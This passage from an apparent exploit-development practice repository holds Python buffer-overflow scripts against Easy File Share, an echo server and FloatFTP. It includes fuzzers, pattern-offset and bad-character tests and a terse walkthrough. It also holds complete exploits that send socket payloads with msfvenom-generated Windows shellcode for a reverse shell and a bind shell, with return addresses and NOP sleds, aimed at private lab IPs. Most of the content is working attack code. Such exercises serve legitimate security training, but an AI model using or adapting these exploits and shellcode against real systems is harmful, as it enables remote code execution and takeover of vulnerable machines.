21 | print("Unable to connect.......") 22 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys, struct 5 | 6 | #msfvenom -p windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x20" 7 | 8 | Shellcode= ("\xbb\xa9\xf6\x1c\x9a\xdb\xd6\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" 9 | "\x52\x83\xc2\x04\x31\x5a\x0e\x03\xf3\xf8\xfe\x6f\xff\xed\x7d" 10 | "\x8f\xff\xed\xe1\x19\x1a\xdc\x21\x7d\x6f\x4f\x92\xf5\x3d\x7c" 11 | "\x59\x5b\xd5\xf7\x2f\x74\xda\xb0\x9a\xa2\xd5\x41\xb6\x97\x74" 12 | "\xc2\xc5\xcb\x56\xfb\x05\x1e\x97\x3c\x7b\xd3\xc5\x95\xf7\x46" 13 | "\xf9\x92\x42\x5b\x72\xe8\x43\xdb\x67\xb9\x62\xca\x36\xb1\x3c" 14 | "\xcc\xb9\x16\x35\x45\xa1\x7b\x70\x1f\x5a\x4f\x0e\x9e\x8a\x81" 15 | "\xef\x0d\xf3\x2d\x02\x4f\x34\x89\xfd\x3a\x4c\xe9\x80\x3c\x8b" 16 | "\x93\x5e\xc8\x0f\x33\x14\x6a\xeb\xc5\xf9\xed\x78\xc9\xb6\x7a" 17 | "\x26\xce\x49\xae\x5d\xea\xc2\x51\xb1\x7a\x90\x75\x15\x26\x42" 18 | "\x17\x0c\x82\x25\x28\x4e\x6d\x99\x8c\x05\x80\xce\xbc\x44\xcd" 19 | "\x23\x8d\x76\x0d\x2c\x86\x05\x3f\xf3\x3c\x81\x73\x7c\x9b\x56" 20 | "\x73\x57\x5b\xc8\x8a\x58\x9c\xc1\x48\x0c\xcc\x79\x78\x2d\x87" 21 | "\x79\x85\xf8\x08\x29\x29\x53\xe9\x99\x89\x03\x81\xf3\x05\x7b" 22 | "\xb1\xfc\xcf\x14\x58\x07\x98\xda\x35\x07\xdf\xb3\x47\x07\xdb" 23 | "\x91\xc1\xe1\x89\x05\x84\xba\x25\xbf\x8d\x30\xd7\x40\x18\x3d" 24 | "\xd7\xcb\xaf\xc2\x96\x3b\xc5\xd0\x4f\xcc\x90\x8a\xc6\xd3\x0e" 25 | "\xa2\x85\x46\xd5\x32\xc3\x7a\x42\x65\x84\x4d\x9b\xe3\x38\xf7" 26 | "\x35\x11\xc1\x61\x7d\x91\x1e\x52\x80\x18\xd2\xee\xa6\x0a\x2a" 27 | "\xee\xe2\x7e\xe2\xb9\xbc\x28\x44\x10\x0f\x82\x1e\xcf\xd9\x42" 28 | "\xe6\x23\xda\x14\xe7\x69\xac\xf8\x56\xc4\xe9\x07\x56\x80\xfd" 29 | "\x70\x8a\x30\x01\xab\x0e\x50\xe0\x79\x7b\xf9\xbd\xe8\xc6\x64" 30 | "\x3e\xc7\x05\x91\xbd\xed\xf5\x66\xdd\x84\xf0\x23\x59\x75\x89" 31 | "\x3c\x0c\x79\x3e\x3c\x05") 32 | 33 | jmp_esp= struct.pack(" 1036 } 17 | 2. bad char \x00 18 | 3. return address => "0028F700" 43434343 CCCC 19 | 20 | "\x00\xf7\x28\x00" 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 1036+ "B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.129',9000)) 10 | print("Sending pattern to Remote server" ) 11 | s.send(Shellcode) 12 | print s.recv(1024) 13 | print "\nDone!." 14 | s.close() 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ( 5 | "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 6 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 7 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 8 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 10 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 11 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 12 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 13 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 14 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 15 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 16 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 17 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 18 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 19 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 20 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 21 | ) 22 | 23 | 24 | Shellcode="A" * 1036+ "B" * 4 + badchars 25 | 26 | 27 | try: 28 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 29 | s.connect(('192.168.0.129',9000)) 30 | print("Sending pattern to Remote server" ) 31 | s.send(Shellcode) 32 | print s.recv(1024) 33 | print "\nDone!." 34 | s.close() 35 | 36 | except: 37 | print("Error in connecting") 38 | sys.exit() 39 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/extra_op.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 1036+ "B" * 4 + "C" * 1000 5 | 6 | try: 7 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 8 | s.connect(('192.168.0.129',9000)) 9 | print("Sending pattern to Remote server" ) 10 | s.send(Shellcode) 11 | print s.recv(1024) 12 | print "\nDone!." 13 | s.close() 14 | 15 | except: 16 | print("Error in connecting") 17 | sys.exit() 18 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/extra_op2.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | #0028F764 4 | 5 | Shellcode="A" * 1036+ "\x64\xf7\x28\x00"+ "C" * 1000 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.129',9000)) 10 | print("Sending pattern to Remote server" ) 11 | s.send(Shellcode) 12 | print s.recv(1024) 13 | print "\nDone!." 14 | s.close() 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 2000 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.129',9000)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send((buffer )) 12 | s.recv(1024) 13 | s.close() 14 | 15 | #buffer=buffer + "A"*100 16 | 17 | 18 | except: 19 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 20 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | offset="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.129',9000)) 10 | print("Sending pattern to Remote server" ) 11 | s.send(offset) 12 | print s.recv(1024) 13 | print "\nDone!." 14 | s.close() 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/shellcode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | 3 | #binf shell msfvenom -p windows/shell_bind_tcp -f c 4 | 5 | #"\x64\xf7\x28\x00" 6 | import sys, socket 7 | 8 | code = ( 9 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 10 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 11 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 12 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 13 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 14 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 15 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 16 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 17 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 18 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" 19 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" 20 | "\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40" 21 | "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" 22 | "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" 23 | "\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97" 24 | "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57" 25 | "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" 26 | "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" 27 | "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0" 28 | "\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5" 29 | "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb" 30 | "\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5") 31 | 32 | 33 | 34 | 35 | 36 | Shellcode="A" * 1036+ "\x64\xf7\x28\x00" + "\x90" * 10 + code 37 | 38 | 39 | Shellcode = "\x90" * 36 + code +"\x64\xf7\x28\x00" 40 | 41 | try: 42 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 43 | s.connect(('192.168.0.129',9000)) 44 | print("Sending pattern to Remote server" ) 45 | s.send(Shellcode) 46 | print s.recv(1024) 47 | print "\nDone!." 48 | s.close() 49 | 50 | except: 51 | print("Error in connecting") 52 | sys.exit() 53 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/walkthi: -------------------------------------------------------------------------------- 1 | ./// Echo server v2 2 | 3 | APp Echo Server 4 | IP :192.169.0.129 5 | 6 | Port 9000 7 | ___________________________________ 8 | 9 | 1. Buffer sent 2000 crashed 10 | 11 | 2. create pattern 2000 12 | 13 | 3. EIP vlaue => 69423569 14 | 15 | 4. offset vlaue=> 1036 16 | 17 | 5. Sending Extra character in buffer {A+B+C} 18 | 19 | 6. Observed that EIP ="B{42}" not point to next instruction for "C(43") 20 | 21 | 7. Point EIp to somwhere in Buffer where entry fo "A" is there{0028F764} and check TOS 22 | 23 | 8.send paylaod again look TOS 24 | 25 | 9. Send final shellcode 26 | 27 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/badc1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | badchars = ( 5 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10" 6 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 7 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 8 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 10 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 11 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 12 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 13 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 14 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 15 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 16 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 17 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 18 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 19 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 20 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 21 | ) 22 | buffer = "A" * 247+ "B" * 4 + badchars 23 | try: 24 | print "\nSending evil buffer..." 25 | s.connect(('192.168.1.190', 21)) 26 | s.send('GET ' + buffer + '\r\n\r\n') 27 | print s.recv(1024) 28 | s.close() 29 | print "\nDone!" 30 | except: 31 | print "Could not connect" -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/badc2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | badchars = ( 5 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10" 6 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 7 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 8 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 10 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 11 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 12 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 13 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 14 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 15 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 16 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 17 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 18 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 19 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 20 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 21 | ) 22 | buffer = "A" * 247+ "B" * 4 + badchars 23 | try: 24 | print "\nSending evil buffer..." 25 | s.connect(('192.168.1.190', 21)) 26 | s.send('GET ' + buffer + '\r\n\r\n') 27 | print s.recv(1024) 28 | s.close() 29 | print "\nDone!" 30 | except: 31 | print "Could not connect" -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/badchar.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | badchars = ( 5 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 6 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 7 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 8 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 9 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 10 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 11 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 12 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 13 | ) 14 | buffer = "A" * 247+ "B" * 4 + badchars 15 | try: 16 | print "\nSending evil buffer..." 17 | s.connect(('192.168.1.116', 21)) 18 | s.send('GET ' + buffer + '\r\n\r\n') 19 | print s.recv(1024) 20 | s.close() 21 | print "\nDone!" 22 | except: 23 | print "Could not connect" -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/exploit.py: -------------------------------------------------------------------------------- 1 | import socket 2 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 | sock.connect(('192.168.1.116',21)) 4 | pre_buff="GET " 5 | 6 | end_buff=" HTTP/1.1\r\n\r\n" 7 | #Return address 7xb32d69 is written like that because of little endian 8 | buf = "" 9 | buf += "\xda\xc1\xba\xf5\xf0\x2d\x2c\xd9\x74\x24\xf4\x5e\x29" 10 | buf += "\xc9\xb1\x52\x83\xee\xfc\x31\x56\x13\x03\xa3\xe3\xcf" 11 | buf += "\xd9\xb7\xec\x92\x22\x47\xed\xf2\xab\xa2\xdc\x32\xcf" 12 | buf += "\xa7\x4f\x83\x9b\xe5\x63\x68\xc9\x1d\xf7\x1c\xc6\x12" 13 | buf += "\xb0\xab\x30\x1d\x41\x87\x01\x3c\xc1\xda\x55\x9e\xf8" 14 | buf += "\x14\xa8\xdf\x3d\x48\x41\x8d\x96\x06\xf4\x21\x92\x53" 15 | buf += "\xc5\xca\xe8\x72\x4d\x2f\xb8\x75\x7c\xfe\xb2\x2f\x5e" 16 | buf += "\x01\x16\x44\xd7\x19\x7b\x61\xa1\x92\x4f\x1d\x30\x72" 17 | buf += "\x9e\xde\x9f\xbb\x2e\x2d\xe1\xfc\x89\xce\x94\xf4\xe9" 18 | buf += "\x73\xaf\xc3\x90\xaf\x3a\xd7\x33\x3b\x9c\x33\xc5\xe8" 19 | buf += "\x7b\xb0\xc9\x45\x0f\x9e\xcd\x58\xdc\x95\xea\xd1\xe3" 20 | buf += "\x79\x7b\xa1\xc7\x5d\x27\x71\x69\xc4\x8d\xd4\x96\x16" 21 | buf += "\x6e\x88\x32\x5d\x83\xdd\x4e\x3c\xcc\x12\x63\xbe\x0c" 22 | buf += "\x3d\xf4\xcd\x3e\xe2\xae\x59\x73\x6b\x69\x9e\x74\x46" 23 | buf += "\xcd\x30\x8b\x69\x2e\x19\x48\x3d\x7e\x31\x79\x3e\x15" 24 | buf += "\xc1\x86\xeb\xba\x91\x28\x44\x7b\x41\x89\x34\x13\x8b" 25 | buf += "\x06\x6a\x03\xb4\xcc\x03\xae\x4f\x87\xeb\x87\x4e\x24" 26 | buf += "\x84\xd5\x50\xdb\x08\x53\xb6\xb1\xa0\x35\x61\x2e\x58" 27 | buf += "\x1c\xf9\xcf\xa5\x8a\x84\xd0\x2e\x39\x79\x9e\xc6\x34" 28 | buf += "\x69\x77\x27\x03\xd3\xde\x38\xb9\x7b\xbc\xab\x26\x7b" 29 | buf += "\xcb\xd7\xf0\x2c\x9c\x26\x09\xb8\x30\x10\xa3\xde\xc8" 30 | buf += "\xc4\x8c\x5a\x17\x35\x12\x63\xda\x01\x30\x73\x22\x89" 31 | buf += "\x7c\x27\xfa\xdc\x2a\x91\xbc\xb6\x9c\x4b\x17\x64\x77" 32 | buf += "\x1b\xee\x46\x48\x5d\xef\x82\x3e\x81\x5e\x7b\x07\xbe" 33 | buf += "\x6f\xeb\x8f\xc7\x8d\x8b\x70\x12\x16\xbb\x3a\x3e\x3f" 34 | buf += "\x54\xe3\xab\x7d\x39\x14\x06\x41\x44\x97\xa2\x3a\xb3" 35 | buf += "\x87\xc7\x3f\xff\x0f\x34\x32\x90\xe5\x3a\xe1\x91\x2f" 36 | 37 | buff = "A"*247 + "\x03\xb5\xdd\x75"+"\x90"*20+buf 38 | final_buff = pre_buff+buff+end_buff 39 | sock.send(final_buff) 40 | sock.recv(1024) 41 | sock.close() 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/newoffset.py: -------------------------------------------------------------------------------- 1 | import socket 2 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 | sock.connect(('192.168.1.116',21)) 4 | pre_buff="GET " 5 | buff = "A"*247 +"B"*4 + "C"*749 6 | end_buff=" HTTP/1.1\r\n\r\n" 7 | final_buff = pre_buff+buff+end_buff 8 | sock.send(final_buff) 9 | sock.recv(1024) 10 | sock.close() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/pattern.py: -------------------------------------------------------------------------------- 1 | import socket 2 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 | sock.connect(('192.168.1.116',21)) 4 | pre_buff = "GET " 5 | buff = 